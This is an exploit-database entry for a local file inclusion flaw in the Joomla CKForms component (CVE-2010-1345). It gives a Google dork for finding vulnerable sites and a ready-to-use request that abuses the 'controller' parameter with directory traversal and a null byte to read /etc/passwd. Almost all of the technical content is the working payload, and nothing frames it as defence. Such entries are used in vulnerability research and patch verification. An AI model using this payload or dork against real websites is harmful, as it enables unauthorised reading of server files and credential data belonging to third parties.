Joomla! Component Cookex Agency CKForms - Local File Inclusion

Author: ALTBTA
type: webapps
platform: php
port: 
date_added: 2010-11-08  
date_updated: 2016-12-15  
verified: 1  
codes: CVE-2010-1345;OSVDB-63031  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comcom_ckforms_b1.zip  

raw file: 15453.txt  

####################################################################
>>>>> Author : altbta [l_9@hotmail.com<mailto:l_9@hotmail.com>]
>>>>> Home : www.v4-team.com/cc<http://www.v4-team.com/cc>
>>>>> Script : Joomla Component com_ckforms
>>>>> Bug Type : Multiple Vulnerabilities
>>>>> Dork : inurl:"com_ckforms"

http://extensions.joomla.org/extensions/contacts-and-feedback/forms/4939
####################################################################

===[ Exploit ]=== [LFI]

http://site/index.php?option=com_ckforms&controller=[LFI]
http://site.com/index.php?option=com_ckforms&controller=../../../.
./../../../../../../etc/passwd%00

####################################################################
RxH & ab0-3th4b